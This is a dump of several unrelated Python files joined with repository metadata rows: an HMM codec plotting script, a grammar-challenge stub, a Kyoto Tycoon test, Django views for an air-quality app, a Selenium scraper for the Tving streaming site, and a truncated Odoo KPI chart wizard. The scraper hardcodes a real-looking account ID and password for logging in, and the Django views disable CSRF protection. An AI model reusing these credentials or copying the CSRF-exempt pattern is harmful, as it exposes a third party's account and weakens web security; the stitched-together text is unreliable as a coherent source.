print(h)
xs = np.concatenate(compress_inputs)[:h.T]
params = list(map(partial(hmm_codec.quantized_cdf, h), (a0, a, b)))
rng = np.random.default_rng(1)
lengths = []
hs = []
message_lengths = []
l = 4
while l <= h.T:
codec = hmm_codec.hmm_codec(replace(h, T=l), params)
lengths.append(l)
hs.append(-hmm_codec.hmm_logpmf(h, params, xs[:l]) / l)
message = cs.base_message(1)
message = codec.push(message, xs[:l])
message_lengths.append(len(cs.flatten(message)) * 32 / l)
l = 2 * l
fig, ax = plt.subplots(figsize=[2.7,1.8])
ax.plot(lengths, np.divide(message_lengths, hs), color='black', lw=.5)
ax.set_yscale('log')
ax.yaxis.set_minor_locator(ticker.FixedLocator([1., 2., 3., 6., 10.]))
ax.yaxis.set_major_locator(ticker.NullLocator())
ax.yaxis.set_minor_formatter(ticker.ScalarFormatter())
ax.hlines(y=1, xmin=0, xmax=h.T + 1, color='gray', lw=.5)
ax.set_xlim(0, h.T)
ax.set_xlabel('$T$')
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_linewidth(0.5)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_linewidth(0.5)
ax.tick_params(width=.5)
plt.tight_layout()
plt.savefig('em_model.pdf')
| UTF-8 | Python | false | false | 5,022 | py | 5 | generate_model_plot.py | 3 | 0.638192 | 0.623656 | 0 | 148 | 32.932432 | 78 |
DayGitH/Python-Challenges | 7,894,149,913,220 | 9c07989fe2d9c7f6bf2f7f8c5222161cdf9734f6 | f1961c86e6da14f35c21d7235f4fc8a89fabdcad | /DailyProgrammer/DP20130118C.py | 160f08637796b83bdedb555ed267c1057285d4c5 | [
"MIT"
]
| permissive | https://github.com/DayGitH/Python-Challenges | d4930bdd85cd1a977d8f6192775ca956a375fcde | bc32f1332a92fcc2dfa6f5ea4d95f8a8d64c3edf | refs/heads/master | 2021-01-17T13:01:03.784523 | 2018-06-29T23:49:04 | 2018-06-29T23:49:04 | 58,497,683 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
[01/18/13] Challenge #117 [Hard] Verify Your Language!
https://www.reddit.com/r/dailyprogrammer/comments/16t2sx/011813_challenge_117_hard_verify_your_language/
# [](#HardIcon) *(Hard)*: Verify Your Language!
[Context-free grammar](http://en.wikipedia.org/wiki/Context-free_grammar) is a tool heavily used in programming
language design, verification, compiling, and execution. It is, essentially, a formal language used to define a grammar
(i.e. another language). CFG are "more powerful" (in that they can verify more complex languages) than other grammars,
such as regular-expressions.
Programming language expressions are generally validated through CFGs. This is done by applying several products on an
expression, subdividing the statement into known components, and finally into "terminal" components (i.e. parts of an
expression that cannot be more subdivided). An example could be a CFG that only accepts addition expressions, such as
"123 + 456". Such a CFG would have two rules that could be applied to verify if this expression was valid: A -> Int +
Int, and Int -> '0123456789'Int | NULL
It is ** extremely important** that the reader understands CFG and the formal language associated with it - the above
is simply a refresher / casual introduction to the subject.
Your goal is to write a program that accepts a CFG definition and a series of expressions, printing true or false for
each expression if it is a valid expression of the given CFG.
*Author: nint22*
# Formal Inputs & Outputs
## Input Description
First, your program must accept an integer N, where there will be N products, one per line, right below this integer.
To keep things simple, products must be a single upper-case letter, such as "S". The letter "E" is reserved as the
null-terminator. The equal-character "=" is reserved as the product definition operator. Finally, the pipe-character
"|" is reserved for defining sets of possible products.
This syntax is similar to the "on-paper" definition, with the small difference of substituting "E" and "->" for the
greek-letter and arrow symbols.
Assume that the grammar is valid; you do not have to error-check or handle "bad" CFG definitions.
Next, you program must accept an integer M, where there will be M expressions, one per line, that must be tested by the
above-defined grammar.
## Output Description
For each expression M, print true or false, based on wether or not the expression is a valid expression of the given
CFG.
# Sample Inputs & Outputs
## Sample Input
3
S = SS
S = (S)
S = ()
4
()
((()))
(()(()))
(()
## Sample Output
True
True
True
False
# Challenge Input
8
S = x
S = y
S = z
S = S + S
S = S - S
S = S * S
S = S / S
S = ( S )
3
( x + y ) * x - z * y / ( x + x )
(xx - zz + x / z)
x + y * x - z * y / x + x
## Challenge Input Solution
True
False
False
# Note
Some grammars may be ambiguous! Make sure to research what that means, though it should not affect your solution - I
mention this simply to give you a warning if you see odd parsing behavior while debugging.
*Bonus*: A short-hand method of having multiple products from one function-name is the "pipe operator", such as "S = x
| y | z", instead of three separate "S = x", "S = y", "S = z". Support this notation system as a bonus.
"""
def main():
pass
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 3,430 | py | 922 | DP20130118C.py | 921 | 0.708163 | 0.695627 | 0 | 82 | 40.829268 | 119 |
sousajmr/ptpy | 9,311,489,120,173 | 5fbf25023f9ba420a1c9b9078d8daba96209a727 | 531ed2d580fd389cb472af8344ed0caf9e241a89 | /tornado/demos/lihuashu/docs/common_bak/toto.py | 471e34816d90197016e3c994ad63f2aee6bc323d | []
| no_license | https://github.com/sousajmr/ptpy | dee83971973ce0069b1b27aeab16bca4a3a6504a | f35169ecf410240e7569ff0195524f874ca6660e | refs/heads/master | 2021-01-10T20:08:15.848115 | 2013-04-05T05:23:02 | 2013-04-05T05:23:02 | 10,300,362 | 1 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null | #coding:utf8
#from fdfs import Fdfs
#fs=Fdfs()
#fs.open()
from kyototycoon import KyotoTycoon
k=KyotoTycoon()
k.open()
po=k.set("编解码;编解码","编码编码编码编码编码",60)
print(po)
'''
p=k.remove('jia')
print(p)
'''
p=k.get_str("编解码;编解码")
print(p) | UTF-8 | Python | false | false | 289 | py | 345 | toto.py | 237 | 0.640816 | 0.628571 | 0 | 15 | 14.466667 | 35 |
fazeVaib/Zephyr | 7,954,279,454,840 | 5aa58e12a9fc9c11a85ca4709872488cd3716305 | b9c78fe1f197be8e99b0a89c52aec2a9a36e4ce1 | /src/app_zephyr/views.py | 77df1a01570fd6e2e523ee882b62146466a2e564 | []
| no_license | https://github.com/fazeVaib/Zephyr | 54d7009b5622b485e32d863cb9a810449d37023b | 27729b1dc2772d268a4797938e605a09b66f514a | refs/heads/master | 2022-12-10T15:40:45.603656 | 2020-06-07T15:06:16 | 2020-06-07T15:06:16 | 175,456,694 | 7 | 1 | null | false | 2022-06-21T21:46:35 | 2019-03-13T16:15:33 | 2022-05-05T08:48:33 | 2022-06-21T21:46:35 | 57,030 | 7 | 1 | 5 | JavaScript | false | false | from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.views import View
from .stats import get_stat_data
from .daily_predicted_data_delhi import get_daily_delhi_pred
from .monthly_predicted_data import get_monthly_pred
from .yearly_predicted_data import get_yearly_pred
from .live_data import get_live_data
from pprint import pprint
from .models import CityName
from zephyr.settings import BASE_DIR
from zephyr_api.models import ZephyrDailyAPI, ZephyrMonthlyAPI, ZephyrYearlyAPI
import os
import pandas as pd
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# class Index(View):
# def get(self, request, *args, **kwargs):
# context = {}
# return render(requests, "app_zephyr/index.html", context)
#
# def post(self, requests, *args, **kwargs):
# city_n = requests.POST.get("clickedCity")
# print(city_n)
# q_set = CityName.objects.filter(id=1)
# if q_set.count() != 0:
# obj = q_set.first()
# obj.city = city_n
# obj.save()
# context = {}
# return render(request, "app_zephyr/index.html", context)
@csrf_exempt
def indexView(request, *args, **kwargs):
if request.method == "GET":
context = {}
print(BASE_DIR)
return render(request, "app_zephyr/index.html", context)
elif request.method == "POST":
city_n = request.POST.get("clickedCity")
print(city_n)
q_set = CityName.objects.filter(id=1)
if q_set.count() != 0:
obj = q_set.first()
obj.city = city_n
obj.save()
context = {}
return render(request, "app_zephyr/index.html", context)
@csrf_exempt
def dataPageView(request, *args, **kwargs):
if request.method == "GET":
q_set = CityName.objects.filter(id=1)
if q_set.count() != 0:
obj = q_set.first()
city = obj.city
print("City Name Received: " + city)
live_data = get_live_data(city)
print(live_data)
context = {
"city_name": city,
"data": live_data
}
return render(request, "app_zephyr/second.html", context)
elif request.method == "POST":
pass
class LiveDataView(View):
def get(self, request, *args, **kwargs):
q_set = CityName.objects.filter(id=1)
if q_set.count() != 0:
obj = q_set.first()
city = obj.city
print("City Name Received: " + city)
live_data = get_live_data(city)
# pprint(stat_data)
return JsonResponse(live_data, safe=False)
class DailyDataView(View):
def get(self, request, *args, **kwargs):
daily_delhi_pred = get_daily_delhi_pred(BASE_DIR)
# pprint(daily_delhi_pred)
return JsonResponse(daily_delhi_pred)
class MonthlyDataView(View):
def get(self, request, *args, **kwargs):
q_set = CityName.objects.filter(id=1)
if q_set.count() != 0:
obj = q_set.first()
city = obj.city
print("City Name Received: " + city)
monthly_data = get_monthly_pred(city, BASE_DIR)
# pprint(monthly_data)
return JsonResponse(monthly_data)
class YearlyDataView(View):
def get(self, request, *args, **kwargs):
q_set = CityName.objects.filter(id=1)
if q_set.count() != 0:
obj = q_set.first()
city = obj.city
print("City Name Received: " + city)
# monthly_data = get_monthly_pred(city)
yearly_data = get_yearly_pred(city, BASE_DIR)
# pprint(yearly_data)
return JsonResponse(yearly_data)
class StatisticsDataView(View):
def get(self, request, *args, **kwargs):
# return HttpResponse("<h1> This is the Home Page. </h1>")
stat_data = get_stat_data(BASE_DIR)
# pprint(stat_data)
return JsonResponse(stat_data)
class StatisticsView(View):
def get(self, request, *args, **kwargs):
# return HttpResponse("<h1> This is the Home Page. </h1>")
stat_data = get_stat_data(BASE_DIR)
# pprint(stat_data)
return render(request, "app_zephyr/sidebar.html", stat_data)
class DatabaseDailyPredictedDatafill(View):
def get(self, request, *args, **kwargs):
# qs = ZephyrDailyAPI.objects.all()
# for i in qs:
# print(i, type(i), i.daily_updated)
# i.delete()
# print("Object deleted")
# df = pd.read_csv("/media/rishi/01D3D31D70AD1520/MINOR_PROJECT/zephyr_project/src/app_zephyr/daily_predicted_data_delhi/predicted_delhi.csv")
# print(df.count())
# print(df.values)
# c = 0
# for j in df.values:
# print(j[0], j[1])
# obj = ZephyrDailyAPI()
# obj.daily_city = "Delhi"
# obj.daily_date = j[0]
# obj.daily_aqi = j[1]
# obj.save()
# print(c)
# print("================================")
# c += 1
# print(c)
return HttpResponse("<h1> This is the Database Daily Predicted Data Fill Page. </h1>")
class DatabaseMonthlyPredictedDatafill(View):
def get(self, request, *args, **kwargs):
# qs = ZephyrMonthlyAPI.objects.all()
# for i in qs:
# # print(i, type(i), i.daily_updated)
# i.delete()
# # print("Object deleted")
# folder_path = "/media/rishi/01D3D31D70AD1520/MINOR_PROJECT/zephyr_project/src/app_zephyr/monthly_predicted_data/"
# dirs = os.listdir(
# "/media/rishi/01D3D31D70AD1520/MINOR_PROJECT/zephyr_project/src/app_zephyr/monthly_predicted_data")
# # print(dirs)
# # c = 0
# for i in dirs:
# # print(folder_path+i)
# df = pd.read_csv(folder_path + i)
# # print(i[5:-4])
# # print(df.count())
# # print(df.values)
# for j in df.values:
# # print(j[0], j[6], i[5:-4])
# obj = ZephyrMonthlyAPI()
# obj.monthly_city = i[5:-4]
# obj.monthly_date = j[0]
# obj.monthly_aqi = j[6]
# obj.save()
# # print(c)
# # print("================================")
# # c += 1
# # print(c)
return HttpResponse("<h1> This is the Database Monthly Predicted Data Fill Page. </h1>")
class DatabaseYearlyPredictedDatafill(View):
def get(self, request, *args, **kwargs):
# qs = ZephyrYearlyAPI.objects.all()
# for i in qs:
# # print(i, type(i), i.daily_updated)
# i.delete()
# # print("Object deleted")
# folder_path = "/media/rishi/01D3D31D70AD1520/MINOR_PROJECT/zephyr_project/src/app_zephyr/yearly_predicted_data/"
# dirs = os.listdir(
# "/media/rishi/01D3D31D70AD1520/MINOR_PROJECT/zephyr_project/src/app_zephyr/yearly_predicted_data")
# # print(dirs)
# # c = 0
# for i in dirs:
# # print(folder_path+i)
# df = pd.read_csv(folder_path + i)
# # print(i[5:-4])
# # print(df.count())
# # print(df.values)
# for j in df.values:
# # print(j[0], j[6], i[5:-4])
# obj = ZephyrYearlyAPI()
# obj.yearly_city = i[5:-4]
# obj.yearly_date = j[0]
# obj.yearly_aqi = j[6]
# obj.save()
# # print(c)
# # print("================================")
# # c += 1
# # print(c)
return HttpResponse("<h1> This is the Database Yearly Predicted Data Fill Page. </h1>")
| UTF-8 | Python | false | false | 7,768 | py | 209 | views.py | 28 | 0.550206 | 0.536432 | 0 | 221 | 34.149321 | 150 |
jofrankiewicz/AZ | 429,496,770,326 | e999ae780f36ac516419280204079bc0e888f837 | f1d115e44e22e2cc45619edf681451feda3e5f74 | /run.py | e6df99891f99a54346218602646f9a769fd3a47c | []
| no_license | https://github.com/jofrankiewicz/AZ | f66186d6e4f4dd2ac4cb5cf2e1b21510c36b1784 | 43e08ec75d0e53e26bcff3a6f3f3a23fabe434d2 | refs/heads/master | 2023-05-02T22:07:07.898205 | 2021-05-17T14:36:18 | 2021-05-17T14:36:18 | 349,590,548 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import argparse
import time
import glob
import argparse
import random
from alghoritms import Graph
from generate_files import random_graphs
def main():
print('Rozpoczęcie działania programu rozwiązującego problem TSP')
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-g', '--generation', dest='generation', type=bool, default=False,
help='generate graph data')
parser.add_argument('-nv', '--n_val', dest='n_val', type=int, default=600,
help='number of vertices')
parser.add_argument('-mv', '--max_val', dest='max_val', type=int, default=10000,
help='maximum value in graph data')
random.seed(34)
args = vars(parser.parse_args())
if args['generation']:
random_graphs(args['n_val'], args['max_val'])
mylist = [f for f in glob.glob("graph*")]
for filename in mylist:
g = Graph(-1, filename)
name_details=filename.split('_')
methods = [(g.twoApproximation,"2_Approximation"),
(g.christofide, "Christofides")]
f = open("results.txt", "a")
for i, (method, name) in enumerate(methods):
start = time.time()
method()
result = g.tourValue()
end = time.time()
result_time = end-start
print("Ilość wierzchołków: {}, Max waga: {}, Algorytm: {}, Wartość cyklu: {}, Czas: {}".format(name_details[1], name_details[2], name, result, result_time))
f.write(str(name_details[1]))
f.write(" ")
f.write(str(name_details[2]))
f.write(" ")
f.write(str(name_details[3]))
f.write(" ")
f.write(name)
f.write(" ")
f.write(str(result))
f.write(" ")
f.write(str(result_time))
f.write('\n')
f.close()
main() | UTF-8 | Python | false | false | 1,971 | py | 103 | run.py | 6 | 0.551759 | 0.54309 | 0 | 63 | 30.142857 | 168 |
yasmin2496/DSA_Quick_Reference | 8,615,704,420,111 | 77d525217897bdfe4f3f91dea0086ef51f7b4168 | d28c0ef18e7a341e15be98359f4480b5e20e2363 | /solutions/singly_linked_list.py | b31b974eca20d4b367c9ad94b239e1267082f0f0 | [
"MIT"
]
| permissive | https://github.com/yasmin2496/DSA_Quick_Reference | 7d71d609a0e50b65b31b69d86904f9fc4b3a7243 | 827a7d3331d9224e8bb21feb9151a89fc637a649 | refs/heads/main | 2023-04-16T14:24:11.801530 | 2021-04-27T16:15:36 | 2021-04-27T16:15:36 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
class Node:
def __init__(self, value):
self.value = value
self.next = None
class LinkedList:
def __init__(self):
self.head = None
def append(self, value):
if self.head is None:
self.head = Node(value)
return
node = self.head
while node.next:
node = node.next
node.next = Node(value)
def to_list(self):
out_list = []
node = self.head
while node:
out_list.append(node.value)
node = node.next
return out_list
def size(self):
count = 1
node = self.head
if node == None:
return 0
while node.next:
count += 1
node = node.next
return count
def iter(self):
node = self.head
while node:
val = node.value
node = node.next
yield val
def delete(self, value):
node = self.head
prev = self.head
while node:
if node.value == value:
if node == self.head:
self.head == node.next
else:
prev.next = node.next
return
prev = node
node = node.next
def search(self, value):
node = self.head
while node:
if node.value == value:
return True
node = node.next
return False
# Test Case
linked_list = LinkedList()
linked_list.append(5)
linked_list.append(7)
linked_list.append(-1)
linked_list.append(0.9)
linked_list.append(71)
iter_test = []
for value in linked_list.iter():
iter_test.append(value)
print ("Pass" if (linked_list.to_list() == [5, 7, -1, 0.9, 71]) else "Fail")
print ("Pass" if (linked_list.size() == 5) else "Fail")
print ("Pass" if (iter_test == [5, 7, -1, 0.9, 71]) else "Fail")
linked_list.delete(-1)
print ("Pass" if (linked_list.to_list() == [5, 7, 0.9, 71]) else "Fail")
print ("Pass" if (linked_list.search(99) == False) else "Fail")
print ("Pass" if (linked_list.search(7) == True) else "Fail")
| UTF-8 | Python | false | false | 2,142 | py | 46 | singly_linked_list.py | 20 | 0.50747 | 0.49113 | 0 | 94 | 21.765957 | 76 |
AotY/char-lstm | 1,013,612,294,154 | 241f4af055f70070536254f6fedae596b99c765b | 6a4a1875e5f8cff0112e6f45e34b25f909d3d034 | /data_set.py | c775330f56009c2435450ed5354affd7774f0cd5 | []
| no_license | https://github.com/AotY/char-lstm | bcc35fe15ad9b1b5d915ba770cabacfb0164155d | 0bb9be96e3af1380609b95ae81651ec74125086e | refs/heads/master | 2020-04-01T20:06:57.319229 | 2018-10-18T09:38:12 | 2018-10-18T09:38:12 | 153,589,069 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2018 LeonTao
#
# Distributed under terms of the MIT license.
"""
"""
from __future__ import unicode_literals, print_function, division
from io import open
import glob
import os
import unicodedata
import string
import random
import torch
import torch.nn as nn
# sos: - , eos: <
all_letters = '-' + string.ascii_letters + " .,;'<"
n_letters = len(all_letters) + 1 # Plus EOS marker
def findFiles(path):
return glob.glob(path)
# Turn a Unicode string to plain ASCII, thanks to http://stackoverflow.com/a/518232/2809427
def unicodeToAscii(s):
return ''.join(
c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn'
and c in all_letters
)
# Read a file and split into lines
def readLines(filename):
lines = open(filename, encoding='utf-8').read().strip().split('\n')
return [unicodeToAscii(line) for line in lines]
# Build the category_lines dictionary, a list of lines per category
category_lines = {}
all_categories = []
for filename in findFiles('data/names/*.txt'):
category = os.path.splitext(os.path.basename(filename))[0]
all_categories.append(category)
lines = readLines(filename)
category_lines[category] = lines
n_categories = len(all_categories)
if n_categories == 0:
raise RuntimeError('Data not found. Make sure that you downloaded data '
'from https://download.pytorch.org/tutorial/data.zip and extract it to '
'the current directory.')
# Random item from a list
def randomChoice(l):
return l[random.randint(0, len(l) - 1)]
# Get a random category and random line from that category
def randomTrainingPair():
category = randomChoice(all_categories)
line = randomChoice(category_lines[category])
return category, line
# One-hot vector for category
def categoryTensor(category, device):
li = all_categories.index(category)
tensor = torch.zeros(1, n_categories, dtype=torch.long, device=device)
tensor[0][li] = 1
return tensor
# One-hot matrix of first to last letters (not including EOS) for input
def inputTensor(line, device):
tensor = torch.zeros(len(line), dtype=torch.long, device=device)
for li in range(len(line)):
letter = line[li]
tensor[li] = all_letters.find(letter)
return tensor
# LongTensor of second letter to end (EOS) for target
def targetTensor(line, device):
letter_indexes = [all_letters.find(line[li]) for li in range(1, len(line))]
letter_indexes.append(n_letters - 1) # EOS
return torch.LongTensor(letter_indexes, device=device)
# Make category, input, and target tensors from a random category, line pair
def randomTrainingExample(device):
category, line = randomTrainingPair()
category_tensor = categoryTensor(category, device)
input = inputIndex(line)
target = targetIndex(line)
return category_tensor, input, target
def next_batch(max_len, batch_size, device=None):
categories = torch.empty((batch_size, n_categories), dtype=torch.long, device=device)
inputs = torch.empty((max_len, batch_size), dtype=torch.long, device=device)
targets = torch.empty((max_len, batch_size), dtype=torch.long, device=device)
inputs_length = []
for i in range(batch_size):
category_tensor, input, target = randomTrainingPair(device)
inputs_length.append(len(input))
categories[i] = category_tensor
for j, (i_index, t_index) in enumerate(zip(input, target)):
inputs[j, i] = i_index
targets[j, i] = t_index
inputs_length = torch.LongTensor(inputs_length, device=device)
return categories, inputs, inputs_length, targets
| UTF-8 | Python | false | false | 3,702 | py | 5 | data_set.py | 3 | 0.691975 | 0.684139 | 0 | 116 | 30.887931 | 91 |
boo9305/python | 16,123,307,238,248 | 1353e2a2577cf85b0646e0e01f88c0939f277396 | e980207805af1d868a1418527d0be25727c9c878 | /selenium/tving_contents_parser.py | a7408100b23bafcc531a8fc7277463200131b467 | []
| no_license | https://github.com/boo9305/python | 3b279899825e788386f610918c15fd68893ad138 | 1bd689e3182da6bbeda61d2a22de4372a37e57db | refs/heads/master | 2023-02-23T00:38:39.948478 | 2021-01-25T07:07:12 | 2021-01-25T07:07:12 | 328,588,500 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys, time, atexit, json, requests
import settings
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from pyvirtualdisplay import Display
from parser import Parser
class TvingParser(Parser):
main_url = 'https://www.tving.com/vod/genre'
contents_list = []
def __init__(self):
super().__init__()
def __del__(self):
super().__del__()
def login(self):
## 1. move start url
self.driver.get(url='https://user.tving.com/pc/user/login.tving?returnUrl=https%3A%2F%2Fuser.tving.com%2Fpc%2Fuser%2Flogin.tving')
print(self.driver.current_url)
## 2. login
id = self.driver.find_element_by_id('a')
pw = self.driver.find_element_by_id('b')
id.send_keys('zoflr9305')
pw.send_keys('qls0926!')
sm = self.driver.find_element_by_id('doLoginBtn')
sm.click()
time.sleep(1)
print(self.driver.current_url)
profile = self.driver.find_element_by_class_name('profile-icon')
profile.click()
time.sleep(1)
print(self.driver.current_url)
def search_contents_detail(self):
for item in self.contents_list:
self.driver.get(url=item['url'])
soup = BeautifulSoup(self.driver.page_source, 'html.parser')
print(soup.p)
def search_contents_list(self):
self.driver.get(url=self.main_url)
pheight = self.driver.execute_script('return document.body.scrollHeight')
nheight = 0 ;
print(self.driver.current_url)
# scrolling ...
while pheight != nheight:
print('doing scrolling %d' % nheight)
self.driver.execute_script('window.scrollTo(0, document.body.scrollHeight);')
time.sleep(0.3)
pheight = nheight
nheight = self.driver.execute_script('return document.body.scrollHeight')
items = self.driver.find_elements_by_class_name('program-item__info')
link_list = []
# get url list
print('getting url list')
total = 0
for item in items:
item_a = item.find_element(By.TAG_NAME, 'a')
a = item_a.get_attribute('href')
link_list.append(a)
total += 1;
item_a = None;
# write logfile about content
f = open('./logfile', 'w')
for idx, item in enumerate(link_list):
print('running... %s \t %d/%d' % (item, idx, total))
content_dic = {}
self.driver.get(url=item)
try :
content_dic['title'] = self.driver.find_element_by_class_name('title').text
except :
pass
try :
summary = self.driver.find_element_by_class_name('summary').text
except :
pass
try :
content_dic['genre'] = self.driver.find_element_by_class_name('under').text
except :
pass
try :
dds = self.driver.find_elements_by_tag_name('dd')
c = 0;
actor = ""
director = ""
for idx2, dd in enumerate(dds):
if idx2 == 1:
content_dic['actor'] = dd.text
elif idx2 == 2:
content_dic['director'] = dd.text
except:
pass;
content_dic['url'] = item
f.write(str(content_dic) + "\n")
f.close()
## move netfilx movie genre url
#self.driver.get(url=self.movie_korea_url)
#print(self.driver.current_url)
## get movie list by BeautifulSoup
#soup = BeautifulSoup(self.driver.page_source, 'html.parser')
#data =soup.find('script', type='application/ld+json')
#for el in json.loads(data.string)['itemListElement'] :
## print(el)
# item = el['item']
# d = {}
# d['name'] = item['name']
# d['url'] = item['url']
# self.contents_list.append(d)
#return self.contents_list;
def test(self):
self.driver.get(url='https://www.tving.com/movie/player/M000331735')
print(self.driver.current_url)
title = ""
try :
dt = self.driver.find_elements_by_css_selector('.info > dt')
dt_dd = self.driver.find_elements_by_css_selector('.info > dt ~ dd')
print("??")
for idx, xx in enumerate(dt) :
print('%s : %s ' %(dt[idx].text, dt_dd[idx].text))
except :
print("error")
genre = ""
try :
genre = self.driver.find_element_by_class_name('under').text
except :
print("error")
print(title, genre)
if __name__ == '__main__':
tool = TvingParser();
tool.test()
# tool.login()
# tool.search_contents_list()
| UTF-8 | Python | false | false | 5,175 | py | 17 | tving_contents_parser.py | 14 | 0.529469 | 0.521739 | 0 | 164 | 30.54878 | 138 |
hungphatsource/HungPhatSourceCode | 15,212,774,163,305 | b008bc087343aa21cd86d44362ab4c4eb06074a3 | 06598dfdde0cb0ecdd0af6b5aaab57b26aa9d23c | /hpusa_kpis_manufacturing/wizard/wizard_hp_report_kpis_chart.py | a03fc44c50445923b21e795da3907a792b42dd07 | []
| no_license | https://github.com/hungphatsource/HungPhatSourceCode | 98f99d87f0a07ffbf7c622037ea6e87e162c763d | 11141af1fdd397590a1a5a7f7d8dd65abf53a59a | refs/heads/master | 2021-01-21T13:57:40.494472 | 2016-05-13T07:34:35 | 2016-05-13T07:34:35 | 53,999,296 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from osv import fields, osv
from tools.translate import _
from dateutil.relativedelta import relativedelta
import time
from datetime import datetime
from datetime import timedelta
from openerp.addons.pxgo_openoffice_reports import openoffice_report
from openerp.report import report_sxw
class wizard_hp_report_chart_kpis(osv.osv_memory):
_name = "wizard.hp.report.chart.kpis"
_columns = {
'type': fields.selection([
('3d', '3D Design'),
('casting', 'Casting'),
('assembling', 'Assembling'),
('setting', 'Setting'),
], 'Report Type',select=True,required=True),
'option': fields.selection([
('month', 'Month Report'),
('year', 'Year Report'),
], 'Option',select=True),
'month': fields.many2one('account.period', 'Month'),
'month_from': fields.many2one('account.period', 'Month From'),
'month_to': fields.many2one('account.period', 'Month To'),
'type_report': fields.selection([
('synthetic', 'Synthetic chart'),
('productivity', 'Productivity chart'),
('productivity_worker', 'Productivity chart of worker'),
('compare', 'Comparing synthesis workers'),
], 'Chart Type',select=True,required=True),
'employee_id': fields.many2one('hr.employee', 'Worker'),
}
_defaults={
'option': 'month'
}
wizard_hp_report_chart_kpis()
class wizard_hp_report_chart_kpis_3d(osv.osv_memory):
_name = "wizard.hp.report.chart.kpis.3d"
_table = "wizard_hp_report_chart_kpis"
_inherit = "wizard.hp.report.chart.kpis"
def action_view_chart(self, cr, uid, ids, context):
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
obj = self.browse(cr, uid, ids[0], context)
if obj.type_report == 'synthetic':
_3d_ids = self.pool.get('hp.kpis.view.chart.3d').search(cr, uid, [])
if(_3d_ids):
self.pool.get('hp.kpis.view.chart.3d').unlink(cr, uid, _3d_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#tinh ngay cua tung tuan
if(i == 1):
date_from = date_to
else:
date_from = date_to + relativedelta(days=1)
date_to = date_from + relativedelta(days=6)
#get report 3d line
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _3d_report_id in _3d_report_ids:
line = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.3d').create(cr, uid, {'name': 'Week '+str(i),'point': point, 'quantity': qty})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _3d_report_id in _3d_report_ids:
line = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.3d').create(cr, uid, {'name': month.name,'point': point, 'quantity': qty})
#open action
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_3d_graph')
elif obj.type_report == 'productivity' or obj.type_report == 'productivity_worker':
_3d_ids = self.pool.get('hp.kpis.view.chart.3d.productivity').search(cr, uid, [])
if(_3d_ids):
self.pool.get('hp.kpis.view.chart.3d.productivity').unlink(cr, uid, _3d_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#khoi tao cot cho moi tuan
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': 0, 'quantity': 0})
#tinh ngay cua tung tuan
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
if(not obj.employee_id):
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
else:
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.designer_id','=',obj.employee_id.id),('parent_id.state','=','confirmed')])
for _3d_report_id in _3d_report_ids:
_3d_report = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
if _3d_report.product_id._3d_design_times:
times = _3d_report.product_id._3d_design_times.name
if times > 3:
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
else:
